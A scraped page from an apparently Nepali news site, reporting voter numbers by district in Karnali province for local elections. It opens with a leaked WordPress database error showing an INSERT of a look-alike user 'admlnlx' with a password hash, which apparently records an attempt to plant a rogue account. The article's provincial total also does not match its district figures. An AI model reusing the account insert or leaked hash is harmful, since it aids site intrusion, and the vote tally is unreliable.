WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BSFJzy9RwhhbXZdmcBCIxfkljHpPye0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 00:52:01', '', 'admlnlx', 'admlnlx')
कर्ण बहादुर रोकाया ।। कर्नालीमा स्थानीय तह चुनावका लागि करीब दुई लाख मतदाता रहेका छन् । जसमा सबभन्दा कम डोल्पा जिल्ला छ भने बढी कालीकोट जिल्ला रहेको छ ।
कर्नालीको डोल्पा जिल्लामा १६ हजार ७ सय ३, हुम्लामा २४ हजार ५ सय ६२, मुगुमा २७ हजार ४ सय ३५, जुम्लामा ५४ हजार ६ सय ७७ र कालीकोटमा ६१ हजार २८ मतदाताहरु रहेका छन् । यसरी पाँचै जिल्लाको कुल मतदाता संख्या १ लाख ८४ हजार ३ सय ९५ रहेको छ ।
कर्नालीको डोल्पा जिल्लामा पुरुष मतदाताभन्दा महिला मतदाताको संख्या धेरै छ भने अरु चार जिल्लामा पुरुष मतदाताहरु धेरै रहेका छन् ।
कर्नालीको चार जिल्लामा ७ नगरपालिका भए पनि हुम्ला जिल्लामा नगरपालिका रहेको छैन । यहाँ २९ गाउँपालिका र ७ नगरपालिका गरी ३६ स्थानीय तह रहेको छ । कर्नालीभरी कुनै पनि तेस्रो लिंगी मतदाता रहेका छैनन् ।
कर्नालीको ३६ स्थानीय तहमा २९ गाउँपालिकामा २ सय १२ वडा र ७ नगरपालिका ७८ गरी जम्मा २ सय ९० वडा रहेका छन् ।